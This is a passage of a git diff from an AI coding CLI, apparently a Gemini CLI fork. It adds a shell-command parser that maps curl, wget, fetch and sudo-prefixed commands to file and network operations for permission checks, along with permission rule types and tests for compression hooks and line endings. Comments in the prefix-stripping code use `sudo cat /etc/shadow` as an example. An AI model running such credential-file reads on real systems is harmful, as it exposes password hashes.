.flatMap((url) => { + const op = webOp(url); + return op ? [op] : []; + }); + }, + + wget: (args) => { + const flagsWithValue = new Set([ + '-O', + '--output-document', + '-P', + '--directory-prefix', + '-o', + '--output-file', + '-a', + '--append-output', + '-U', + '--user-agent', + '--header', + '-e', + '--execute', + '--tries', + '-t', + '-T', + '--timeout', + '--wait', + '-w', + '--quota', + '-Q', + '--bind-address', + '--limit-rate', + '--user', + '--password', + '--proxy-user', + '--proxy-password', + '-i', + '--input-file', + '--base', + '--config', + '--referer', + '-D', + '--domains', + '--exclude-domains', + '-I', + '--include-directories', + '-X', + '--exclude-directories', + '--regex-type', + '-A', + '-R', + '--accept', + '--reject', + '--no-check-certificate', + '--ca-certificate', + '--ca-directory', + '--certificate', + '--private-key', + ]); + return getPositionalArgs(args, flagsWithValue) + .filter((p) => p.includes('://') || /^https?:\/\//.test(p)) + .flatMap((url) => { + const op = webOp(url); + return op ? [op] : []; + }); + }, + + fetch: (args) => { + // BSD `fetch` utility + const flagsWithValue = new Set([ + '-o', + '-q', + '-v', + '-a', + '-T', + '-S', + '--no-verify-peer', + '--no-verify-hostname', + '--ca-cert', + ]); + return getPositionalArgs(args, flagsWithValue) + .filter((p) => p.includes('://')) + .flatMap((url) => { + const op = webOp(url); + return op ? [op] : []; + }); + }, +}; + +// ───────────────────────────────────────────────────────────────────────────── +// Transparent prefix commands +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Flags that consume the next argument as their value, for specific prefix + * commands. Used by the prefix-stripping logic to correctly skip flag values + * (e.g. `-u root` in `sudo -u root cat /etc/shadow`). + */ +const PREFIX_COMMAND_FLAGS_WITH_VALUE = new Map>([ + [ + 'sudo', + new Set([ + '-u', + '--user', + '-g', + '--group', + '-C', + '--close-from', + '-c', + '--login-class', + '-D', + '--chdir', + '-p', + '--prompt', + '-r', + '--role', + '-t', + '--type', + '-T', + '--command-timeout', + '-U', + '--other-user', + ]), + ], + ['timeout', new Set(['-s', '--signal', '-k', '--kill-after'])], +]); + +/** + * Commands that act as transparent wrappers around the actual command. + * When encountered, the prefix is stripped and the analysis recurses on + * the remaining command string. + * + * Examples: + * `sudo cat /etc/shadow` → analyse `cat /etc/shadow` + * `timeout 10 wget http://…` → analyse `wget http://…` + */ +const PREFIX_COMMANDS = new Set([ + 'sudo', + 'doas', // OpenBSD sudo alternative + 'env', + 'time', + 'nice', + 'ionice', + 'nohup', + 'timeout', + 'unbuffer', + 'stdbuf', +]); + +// ───────────────────────────────────────────────────────────────────────────── +// Main entry point +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Extract virtual file/network operations from a single simple shell command. + * + * This function expects a **single simple command** (no `&&`, `||`, `;`, `|` + * operators). Use `splitCompoundCommand()` before calling this for compound + * commands. + * + * Returns an empty array for: + * - Commands not in the known command table (safe default) + * - Empty or whitespace-only input + * - Pure environment variable assignments (`FOO=bar`) + * + * @param simpleCommand - A single shell command without compound operators. + * @param cwd - Working directory for resolving relative paths. + */ +export function extractShellOperations( + simpleCommand: string, + cwd: string, +): ShellOperation[] { + if (!simpleCommand.trim()) return []; + + const tokens = tokenize(simpleCommand); + if (tokens.length === 0) return []; + + // Extract I/O redirections before dispatching to the command handler. + // This mutates `tokens` in-place by removing redirect tokens. + const { readFiles: redirectReads, writeFiles: redirectWrites } = + extractRedirects(tokens, cwd); + + const cmdName = tokens[0]; + if (!cmdName) { + // Only redirections were present (e.g. `> file` or `< file`) + return [ + ...redirectReads.map((p) => ({ + virtualTool: 'read_file' as const, + filePath: p, + })), + ...redirectWrites.map((p) => ({ + virtualTool: 'write_file' as const, + filePath: p, + })), + ]; + } + + // Skip pure environment variable assignments: `FOO=bar`, `FOO=bar BAR=baz` + if (cmdName.includes('=')) return []; + + const ops: ShellOperation[] = []; + + // ── Transparent prefix commands ─────────────────────────────────────────── + if (PREFIX_COMMANDS.has(cmdName)) { + const flagsWithVal = PREFIX_COMMAND_FLAGS_WITH_VALUE.get(cmdName); + // Find where the actual command starts (after flags, flag-values, and env + // variable assignments). For example: + // sudo -u root cat /file → startIdx skips '-u' AND 'root' + let startIdx = 1; + while (startIdx < tokens.length) { + const t = tokens[startIdx]!; + if (t.startsWith('-')) { + // Skip the flag itself + startIdx++; + // If this flag takes a separate value argument, skip that too + if ( + flagsWithVal?.has(t) && + startIdx < tokens.length && + !tokens[startIdx]!.startsWith('-') + ) { + startIdx++; + } + } else if (t.includes('=')) { + // Environment variable assignment: skip + startIdx++; + } else { + break; + } + } + // `timeout DURATION command` — the duration is a numeric positional that + // precedes the actual command. Skip it. + if ( + cmdName === 'timeout' && + startIdx < tokens.length && + /^\d/.test(tokens[startIdx]!) + ) { + startIdx++; + } + if (startIdx < tokens.length) { + // Reconstruct the inner command and recurse + const innerCommand = tokens.slice(startIdx).join(' '); + ops.push(...extractShellOperations(innerCommand, cwd)); + } + } else { + // ── Dispatch to the known-command handler ───────────────────────────── + const handler = COMMANDS[cmdName]; + if (handler) { + const args = tokens.slice(1); + ops.push(...handler(args, cwd)); + } + // Unknown commands: return no ops (safe — we don't guess what we don't know) + } + + // Append redirect-derived operations + ops.push( + ...redirectReads.map((p) => ({ + virtualTool: 'read_file' as const, + filePath: p, + })), + ...redirectWrites.map((p) => ({ + virtualTool: 'write_file' as const, + filePath: p, + })), + ); + + return ops; +} diff --git a/packages/core/src/permissions/types.ts b/packages/core/src/permissions/types.ts new file mode 100644 index 000000000..01d919cba --- /dev/null +++ b/packages/core/src/permissions/types.ts @@ -0,0 +1,109 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * The result of a permission evaluation for a tool or command. + * - 'allow': Auto-approved, no confirmation needed. + * - 'ask': Requires user confirmation before proceeding. + * - 'deny': Blocked; will not run. + * - 'default': No explicit rule matched; falls back to the global approval mode. + */ +export type PermissionDecision = 'allow' | 'ask' | 'deny' | 'default'; + +/** The type of a permission rule. */ +export type RuleType = 'allow' | 'ask' | 'deny'; + +/** The scope/source of a permission rule. */ +export type RuleScope = 'system' | 'user' | 'workspace' | 'session'; + +/** + * The kind of specifier a rule uses, determines which matching algorithm + * to apply. + * + * - 'command': Shell command glob matching (for Bash / run_shell_command) + * - 'path': File path gitignore-style matching (for Read / Edit / Write tools) + * - 'domain': Domain matching with `domain:` prefix (for WebFetch) + * - 'literal': Simple literal equality (fallback for unknown tool types) + */ +export type SpecifierKind = 'command' | 'path' | 'domain' | 'literal'; + +/** + * A parsed permission rule. + * Rules have the form "ToolName" or "ToolName(specifier)". + * + * Examples: + * "Bash" → all shell commands + * "Bash(git *)" → shell commands matching glob + * "Read(./secrets/**)" → file reads matching path pattern + * "Edit(/src/**\/*.ts)" → file edits matching path pattern + * "WebFetch(domain:x.com)" → web fetch matching domain + * "mcp__server__tool" → specific MCP tool + */ +export interface PermissionRule { + /** The original raw rule string as written in config. */ + raw: string; + /** The canonical tool name or category (e.g. "run_shell_command", "Read", "Edit"). */ + toolName: string; + /** + * Optional specifier for fine-grained matching. + * For shell tools: a command pattern (e.g. "git *"). + * For file tools: a path pattern (e.g. "./secrets/**"). + * For WebFetch: a domain pattern (e.g. "domain:example.com"). + */ + specifier?: string; + /** + * The kind of specifier, determines matching algorithm. + * Set automatically during parsing based on the tool name/category. + */ + specifierKind?: SpecifierKind; +} + +/** A complete set of permission rules organized by type. */ +export interface PermissionRuleSet { + allow: PermissionRule[]; + ask: PermissionRule[]; + deny: PermissionRule[]; +} + +/** + * Context for a permission evaluation. + * + * Different fields are relevant depending on the tool type: + * - Shell tools: provide `command` + * - File tools: provide `filePath` + * - WebFetch: provide `domain` + * - Other tools: only `toolName` is needed + */ +export interface PermissionCheckContext { + /** The canonical tool name being checked. */ + toolName: string; + /** + * The shell command being executed (only for Bash / run_shell_command). + */ + command?: string; + /** + * The file path being accessed (only for Read / Edit / Write tools). + * Should be an absolute path for matching against path patterns. + */ + filePath?: string; + /** + * The domain being fetched (only for WebFetch). + */ + domain?: string; + /** + * A generic specifier for literal matching (e.g. skill name for Skill, + * subagent type for Task/Agent). Used when the rule has a literal + * specifier that doesn't fall into command/path/domain categories. + */ + specifier?: string; +} + +/** A rule with its type and source scope, used for listing rules. */ +export interface RuleWithSource { + rule: PermissionRule; + type: RuleType; + scope: RuleScope; +} diff --git a/packages/core/src/services/chatCompressionService.test.ts b/packages/core/src/services/chatCompressionService.test.ts index 8f19fe9cf..074f46461 100644 --- a/packages/core/src/services/chatCompressionService.test.ts +++ b/packages/core/src/services/chatCompressionService.test.ts @@ -16,6 +16,7 @@ import { tokenLimit } from '../core/tokenLimits.js'; import type { GeminiChat } from '../core/geminiChat.js'; import type { Config } from '../config/config.js'; import type { ContentGenerator } from '../core/contentGenerator.js'; +import { SessionStartSource, PreCompactTrigger } from '../hooks/types.js'; vi.mock('../telemetry/uiTelemetry.js'); vi.mock('../core/tokenLimits.js'); @@ -107,16 +108,27 @@ describe('ChatCompressionService', () => { let mockConfig: Config; const mockModel = 'gemini-pro'; const mockPromptId = 'test-prompt-id'; + let mockFireSessionStartEvent: ReturnType; + let mockGetHookSystem: ReturnType; beforeEach(() => { service = new ChatCompressionService(); mockChat = { getHistory: vi.fn(), } as unknown as GeminiChat; + mockFireSessionStartEvent = vi.fn().mockResolvedValue(undefined); + mockGetHookSystem = vi.fn().mockReturnValue({ + fireSessionStartEvent: mockFireSessionStartEvent, + }); mockConfig = { getChatCompression: vi.fn(), getContentGenerator: vi.fn(), getContentGeneratorConfig: vi.fn().mockReturnValue({}), + getHookSystem: mockGetHookSystem, + getModel: () => 'test-model', + getDebugLogger: () => ({ + warn: vi.fn(), + }), } as unknown as Config; vi.mocked(tokenLimit).mockReturnValue(1000); @@ -274,6 +286,11 @@ describe('ChatCompressionService', () => { expect(result.newHistory).not.toBeNull(); expect(result.newHistory![0].parts![0].text).toBe('Summary'); expect(mockGenerateContent).toHaveBeenCalled(); + expect(mockGetHookSystem).toHaveBeenCalled(); + expect(mockFireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Compact, + mockModel, + ); }); it('should force compress even if under threshold', async () => { @@ -317,6 +334,10 @@ describe('ChatCompressionService', () => { expect(result.info.compressionStatus).toBe(CompressionStatus.COMPRESSED); expect(result.newHistory).not.toBeNull(); + expect(mockFireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Compact, + mockModel, + ); }); it('should return FAILED if new token count is inflated', async () => { @@ -481,4 +502,427 @@ describe('ChatCompressionService', () => { ); expect(result.newHistory).toBeNull(); }); + + it('should not fire SessionStart event when compression fails', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue(10); + vi.mocked(tokenLimit).mockReturnValue(1000); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1, + candidatesTokenCount: 20, + totalTokenCount: 21, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + const result = await service.compress( + mockChat, + mockPromptId, + true, + mockModel, + mockConfig, + false, + ); + + expect(result.info.compressionStatus).toBe( + CompressionStatus.COMPRESSION_FAILED_INFLATED_TOKEN_COUNT, + ); + expect(result.newHistory).toBeNull(); + expect(mockFireSessionStartEvent).not.toHaveBeenCalled(); + }); + + it('should handle SessionStart hook errors gracefully', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue(800); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + mockFireSessionStartEvent.mockRejectedValue( + new Error('SessionStart hook failed'), + ); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + const result = await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + // Should still complete compression despite hook error + expect(result.info.compressionStatus).toBe(CompressionStatus.COMPRESSED); + expect(result.newHistory).not.toBeNull(); + }); + + describe('PreCompact hook', () => { + let mockFirePreCompactEvent: ReturnType; + + beforeEach(() => { + mockFirePreCompactEvent = vi.fn().mockResolvedValue(undefined); + mockGetHookSystem.mockReturnValue({ + fireSessionStartEvent: mockFireSessionStartEvent, + firePreCompactEvent: mockFirePreCompactEvent, + }); + }); + + it('should fire PreCompact hook with Manual trigger when force=true', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 100, + ); + vi.mocked(tokenLimit).mockReturnValue(1000); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1100, + candidatesTokenCount: 50, + totalTokenCount: 1150, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + await service.compress( + mockChat, + mockPromptId, + true, // force = true -> Manual trigger + mockModel, + mockConfig, + false, + ); + + expect(mockFirePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Manual, + '', + ); + }); + + it('should fire PreCompact hook with Auto trigger when force=false', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 800, + ); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + await service.compress( + mockChat, + mockPromptId, + false, // force = false -> Auto trigger + mockModel, + mockConfig, + false, + ); + + expect(mockFirePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Auto, + '', + ); + }); + + it('should not fire PreCompact hook when history is empty', async () => { + vi.mocked(mockChat.getHistory).mockReturnValue([]); + + const result = await service.compress( + mockChat, + mockPromptId, + true, + mockModel, + mockConfig, + false, + ); + + expect(result.info.compressionStatus).toBe(CompressionStatus.NOOP); + expect(mockFirePreCompactEvent).not.toHaveBeenCalled(); + }); + + it('should not fire PreCompact hook when threshold is 0', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(mockConfig.getChatCompression).mockReturnValue({ + contextPercentageThreshold: 0, + }); + + const result = await service.compress( + mockChat, + mockPromptId, + true, + mockModel, + mockConfig, + false, + ); + + expect(result.info.compressionStatus).toBe(CompressionStatus.NOOP); + expect(mockFirePreCompactEvent).not.toHaveBeenCalled(); + }); + + it('should not fire PreCompact hook when under threshold and not forced', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 600, + ); + vi.mocked(tokenLimit).mockReturnValue(1000); + + const result = await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + expect(result.info.compressionStatus).toBe(CompressionStatus.NOOP); + expect(mockFirePreCompactEvent).not.toHaveBeenCalled(); + }); + + it('should handle PreCompact hook errors gracefully', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 800, + ); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + mockFirePreCompactEvent.mockRejectedValue( + new Error('PreCompact hook failed'), + ); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + const result = await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + // Should still complete compression despite hook error + expect(result.info.compressionStatus).toBe(CompressionStatus.COMPRESSED); + expect(result.newHistory).not.toBeNull(); + expect(mockFirePreCompactEvent).toHaveBeenCalled(); + }); + + it('should fire PreCompact hook before compression and SessionStart after', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 800, + ); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + const callOrder: string[] = []; + mockFirePreCompactEvent.mockImplementation(async () => { + callOrder.push('PreCompact'); + }); + mockFireSessionStartEvent.mockImplementation(async () => { + callOrder.push('SessionStart'); + }); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + // PreCompact should be called before SessionStart + expect(callOrder).toEqual(['PreCompact', 'SessionStart']); + }); + + it('should not fire PreCompact hook when hookSystem is null', async () => { + mockGetHookSystem.mockReturnValue(null); + + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 800, + ); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + const result = await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + // Should still complete compression without hook + expect(result.info.compressionStatus).toBe(CompressionStatus.COMPRESSED); + expect(result.newHistory).not.toBeNull(); + // mockFirePreCompactEvent should not be called since hookSystem is null + expect(mockFirePreCompactEvent).not.toHaveBeenCalled(); + }); + }); }); diff --git a/packages/core/src/services/chatCompressionService.ts b/packages/core/src/services/chatCompressionService.ts index 3a89ee103..082971671 100644 --- a/packages/core/src/services/chatCompressionService.ts +++ b/packages/core/src/services/chatCompressionService.ts @@ -14,6 +14,7 @@ import { getCompressionPrompt } from '../core/prompts.js'; import { getResponseText } from '../utils/partUtils.js'; import { logChatCompression } from '../telemetry/loggers.js'; import { makeChatCompressionEvent } from '../telemetry/types.js'; +import { SessionStartSource, PreCompactTrigger } from '../hooks/types.js'; /** * Threshold for compression token count as a fraction of the model's token limit. @@ -124,6 +125,17 @@ export class ChatCompressionService { } } + // Fire PreCompact hook before compression begins + const hookSystem = config.getHookSystem(); + if (hookSystem) { + const trigger = force ? PreCompactTrigger.Manual : PreCompactTrigger.Auto; + try { + await hookSystem.firePreCompactEvent(trigger, ''); + } catch (err) { + config.getDebugLogger().warn(`PreCompact hook failed: ${err}`); + } + } + const splitPoint = findCompressSplitPoint( curatedHistory, 1 - COMPRESSION_PRESERVE_THRESHOLD, @@ -261,6 +273,16 @@ export class ChatCompressionService { }; } else { uiTelemetryService.setLastPromptTokenCount(newTokenCount); + + // Fire SessionStart event after successful compression + try { + await config + .getHookSystem() + ?.fireSessionStartEvent(SessionStartSource.Compact, model ?? ''); + } catch (err) { + config.getDebugLogger().warn(`SessionStart hook failed: ${err}`); + } + return { newHistory: extraHistory, info: { diff --git a/packages/core/src/services/chatRecordingService.ts b/packages/core/src/services/chatRecordingService.ts index 795ac1fe5..14f2f5ba7 100644 --- a/packages/core/src/services/chatRecordingService.ts +++ b/packages/core/src/services/chatRecordingService.ts @@ -81,6 +81,8 @@ export interface ChatRecord { usageMetadata?: GenerateContentResponseUsageMetadata; /** Model used for this response */ model?: string; + /** Context window size of the model used for this response */ + contextWindowSize?: number; /** * Tool call metadata for UI recovery. * Contains enriched info (displayName, status, result, etc.) not in API format. @@ -299,12 +301,14 @@ export class ChatRecordingService { * @param data.message The raw PartListUnion object from the model response * @param data.model The model name * @param data.tokens Token usage statistics + * @param data.contextWindowSize Context window size of the model * @param data.toolCallsMetadata Enriched tool call info for UI recovery */ recordAssistantTurn(data: { model: string; message?: PartListUnion; tokens?: GenerateContentResponseUsageMetadata; + contextWindowSize?: number; }): void { try { const record: ChatRecord = { @@ -320,6 +324,10 @@ export class ChatRecordingService { record.usageMetadata = data.tokens; } + if (data.contextWindowSize !== undefined) { + record.contextWindowSize = data.contextWindowSize; + } + this.appendRecord(record); } catch (error) { debugLogger.error('Error saving assistant turn:', error); diff --git a/packages/core/src/services/fileSystemService.test.ts b/packages/core/src/services/fileSystemService.test.ts index 66446d7e2..7811a96ed 100644 --- a/packages/core/src/services/fileSystemService.test.ts +++ b/packages/core/src/services/fileSystemService.test.ts @@ -6,9 +6,27 @@ import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; import fs from 'node:fs/promises'; -import { StandardFileSystemService } from './fileSystemService.js'; +import { + StandardFileSystemService, + needsUtf8Bom, + resetUtf8BomCache, +} from './fileSystemService.js'; + +const mockPlatform = vi.hoisted(() => vi.fn().mockReturnValue('linux')); +const mockGetSystemEncoding = vi.hoisted(() => + vi.fn().mockReturnValue('utf-8'), +); vi.mock('fs/promises'); +vi.mock('os', () => ({ + default: { + platform: mockPlatform, + }, + platform: mockPlatform, +})); +vi.mock('../utils/systemEncoding.js', () => ({ + getSystemEncoding: mockGetSystemEncoding, +})); vi.mock('../utils/fileUtils.js', async (importOriginal) => { const actual = await importOriginal(); @@ -25,6 +43,9 @@ describe('StandardFileSystemService', () => { beforeEach(() => { vi.resetAllMocks(); + resetUtf8BomCache(); + mockPlatform.mockReturnValue('linux'); + mockGetSystemEncoding.mockReturnValue('utf-8'); fileSystem = new StandardFileSystemService(); }); @@ -254,5 +275,177 @@ describe('StandardFileSystemService', () => { // First two bytes should NOT be FF FE (the UTF-16LE BOM) expect(!(buf[0] === 0xff && buf[1] === 0xfe)).toBe(true); }); + + it('should convert LF to CRLF when writing .bat files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.bat', + content: '@echo off\necho hello\nexit /b 0\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.bat', + '@echo off\r\necho hello\r\nexit /b 0\r\n', + 'utf-8', + ); + }); + + it('should convert LF to CRLF when writing .cmd files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.cmd', + content: '@echo off\necho hello\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.cmd', + '@echo off\r\necho hello\r\n', + 'utf-8', + ); + }); + + it('should not double-convert existing CRLF in .bat files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.bat', + content: '@echo off\r\necho hello\r\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.bat', + '@echo off\r\necho hello\r\n', + 'utf-8', + ); + }); + + it('should handle mixed line endings in .bat files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.bat', + content: 'line1\r\nline2\nline3\r\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.bat', + 'line1\r\nline2\r\nline3\r\n', + 'utf-8', + ); + }); + + it('should be case-insensitive for .BAT extension on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/SCRIPT.BAT', + content: 'echo hello\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/SCRIPT.BAT', + 'echo hello\r\n', + 'utf-8', + ); + }); + + it('should not convert line endings for non-.bat/.cmd files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.sh', + content: '#!/bin/bash\necho hello\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.sh', + '#!/bin/bash\necho hello\n', + 'utf-8', + ); + }); + + it('should not convert line endings for .bat files on non-Windows', async () => { + mockPlatform.mockReturnValue('darwin'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.bat', + content: '@echo off\necho hello\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.bat', + '@echo off\necho hello\n', + 'utf-8', + ); + }); + }); + + describe('needsUtf8Bom', () => { + beforeEach(() => { + resetUtf8BomCache(); + }); + + it('should return true for .ps1 files on Windows with non-UTF-8 code page', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('gbk'); + + expect(needsUtf8Bom('/test/script.ps1')).toBe(true); + }); + + it('should return true for .PS1 files (case-insensitive)', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('gbk'); + + expect(needsUtf8Bom('/test/SCRIPT.PS1')).toBe(true); + }); + + it('should return false for .ps1 files on Windows with UTF-8 code page', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('utf-8'); + + expect(needsUtf8Bom('/test/script.ps1')).toBe(false); + }); + + it('should return false for .ps1 files on non-Windows', () => { + mockPlatform.mockReturnValue('darwin'); + + expect(needsUtf8Bom('/test/script.ps1')).toBe(false); + }); + + it('should return false for non-.ps1 files on Windows with non-UTF-8 code page', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('gbk'); + + expect(needsUtf8Bom('/test/script.sh')).toBe(false); + expect(needsUtf8Bom('/test/file.txt')).toBe(false); + expect(needsUtf8Bom('/test/script.bat')).toBe(false); + }); + + it('should cache the platform/encoding check across calls', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('gbk'); + + needsUtf8Bom('/test/script.ps1'); + needsUtf8Bom('/test/other.ps1'); + + // getSystemEncoding should only be called once due to caching + expect(mockGetSystemEncoding).toHaveBeenCalledTimes(1); + }); + + it('should treat null system encoding as non-UTF-8', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue(null); + + expect(needsUtf8Bom('/test/script.ps1')).toBe(true); + }); }); }); diff --git a/packages/core/src/services/fileSystemService.ts b/packages/core/src/services/fileSystemService.ts index a5017621a..6d2022c75 100644 --- a/packages/core/src/services/fileSystemService.ts +++ b/packages/core/src/services/fileSystemService.ts @@ -5,6 